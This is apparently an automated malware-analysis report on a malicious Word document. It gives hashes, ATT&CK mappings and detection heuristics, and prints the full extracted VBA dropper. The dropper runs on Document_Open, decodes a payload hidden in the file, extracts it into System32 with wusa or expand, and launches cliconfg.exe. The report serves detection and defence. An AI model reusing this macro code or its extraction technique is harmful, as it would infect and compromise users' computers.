Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4588f52af10e123b…

MALICIOUS

Office (OLE)

142.4 KB Created: 2018-02-02 20:31:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 4a67dfd94df2581aeeefacdd8f97e7de SHA-1: f3b62fea38cb44e15984d941445d24e6b309bc7b SHA-256: 4588f52af10e123b050539fe48c317056e944b3ff0f9db9807cfcafaf74e1b8f
450 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains VBA macros that leverage WScript.Shell and cmd.exe, indicating an intent to execute arbitrary commands. The presence of a Document_Open macro and calls to CreateObject and GetObject further suggest the execution of malicious code. The ClamAV detection as 'Doc.Dropper.Agent' reinforces the assessment that this file is a dropper for a second-stage payload.

Heuristics 12

  • ClamAV: Doc.Dropper.Agent-6439018-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6439018-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        proc_query = "SELECT * FROM Win32_Processor"
        Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
        For Each info In proc_results
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
        With ActiveDocument.Content
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 145,858 bytes but its declared streams total only 74,997 bytes — 70,861 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3637 bytes
SHA-256: 82f8910e0616938b44ce5d12ccb45df98b7b3643ca9c054b7ecc59329c55ee47
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    
    Open InputFile For Binary As #1
        Seek #1, nOffset + 1
        lpInBuffer = Input(nCount, #1)
    Close #1
    
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function
Private Sub Document_Open()
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With

    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
        
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    
    If (cbFileBuffer = 134610) Then
        sTempFile = sTempPath & "\setup.cab"
        
        nResult = InStr(Application.Path, "x86")

    nResult = debase64(sFileName, 80896, 53714, sTempFile)
                
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub